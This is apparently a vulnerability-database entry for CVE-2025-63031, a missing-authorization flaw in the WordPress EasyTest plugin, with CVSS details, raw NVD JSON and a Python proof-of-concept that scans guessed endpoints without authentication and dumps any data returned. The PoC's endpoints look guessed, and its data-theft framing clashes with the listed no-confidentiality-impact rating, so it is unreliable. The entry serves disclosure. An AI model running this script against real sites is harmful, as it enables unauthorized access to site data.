Security Vulnerability Report
中文
CVE-2025-63031 CVSS 5.3 MEDIUM

CVE-2025-63031

Published: 2025-12-31 15:15:54
Last Modified: 2026-04-23 15:34:59

Description

Missing Authorization vulnerability in WP Grids EasyTest convertpro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects EasyTest: from n/a through <= 1.0.1.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

EasyTest插件所有版本 <= 1.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-63031 PoC - Missing Authorization in EasyTest Plugin # Target: WordPress site with EasyTest plugin <= 1.0.1 def check_vulnerability(target_url): """ Check if the target is vulnerable to CVE-2025-63031 Missing Authorization vulnerability in EasyTest plugin """ # Common EasyTest API endpoints endpoints = [ '/wp-json/easytest/v1/', '/wp-json/easytest/v1/results', '/wp-json/easytest/v1/config', '/wp-admin/admin-ajax.php?action=easytest_get_results', '/wp-admin/admin-ajax.php?action=easytest_export' ] vulnerable = False for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: # No authentication headers required - this is the vulnerability response = requests.get(url, timeout=10) # If we get a 200 response instead of 401/403, the endpoint is accessible if response.status_code == 200: print(f'[+] Vulnerable endpoint found: {url}') print(f'[+] Response preview: {response.text[:200]}') vulnerable = True elif response.status_code == 403: print(f'[-] Protected endpoint: {url}') except requests.RequestException as e: print(f'[-] Error accessing {url}: {e}') return vulnerable def exploit_unauthorized_access(target_url): """ Exploit the missing authorization to access sensitive data """ # Try to access test results without authorization data_endpoints = [ '/wp-json/easytest/v1/results', '/wp-json/easytest/v1/all-data' ] for endpoint in data_endpoints: url = target_url.rstrip('/') + endpoint try: response = requests.get(url, timeout=10) if response.status_code == 200: print(f'[+] Successfully accessed sensitive data at: {url}') return response.json() except: pass return None if __name__ == '__main__': import sys if len(sys.argv) > 1: target = sys.argv[1] print(f'[*] Scanning {target} for CVE-2025-63031...') if check_vulnerability(target): print('[!] Target is VULNERABLE to CVE-2025-63031') print('[*] Attempting to exploit...') data = exploit_unauthorized_access(target) if data: print(f'[+] Exfiltrated data: {data}') else: print('[*] Target appears NOT vulnerable') else: print('Usage: python cve-2025-63031_poc.py <target_url>')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63031", "sourceIdentifier": "[email protected]", "published": "2025-12-31T15:15:54.320", "lastModified": "2026-04-23T15:34:59.377", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in WP Grids EasyTest convertpro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects EasyTest: from n/a through <= 1.0.1."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en WP Grids EasyTest permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a EasyTest: desde n/d hasta 1.0.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/convertpro/vulnerability/wordpress-easytest-plugin-1-0-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}